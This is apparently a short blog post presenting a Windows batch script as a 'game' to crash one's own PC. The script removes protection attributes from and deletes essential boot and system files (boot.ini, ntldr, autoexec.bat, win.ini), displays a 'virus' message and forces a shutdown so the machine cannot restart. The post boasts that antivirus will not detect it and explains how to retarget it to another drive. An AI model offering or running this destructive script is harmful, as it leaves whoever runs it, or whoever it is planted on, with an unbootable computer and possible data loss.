Cool Virus To Crash Your Own PC
A game with urself using dos commands. Play this game at your own risk.
Open Notepad-
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOUR COMP IS CRASHING
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
save as bat file
This will shut down the computer never to reboot again!
Type this in notepad and save as with this name
The antivirus will not detect this virus as it is only a code.
Basically this program will delete all that files which are needed for booting
If your operating system is installed in d drive instead of c then replace c with d.



0 comments:
Post a Comment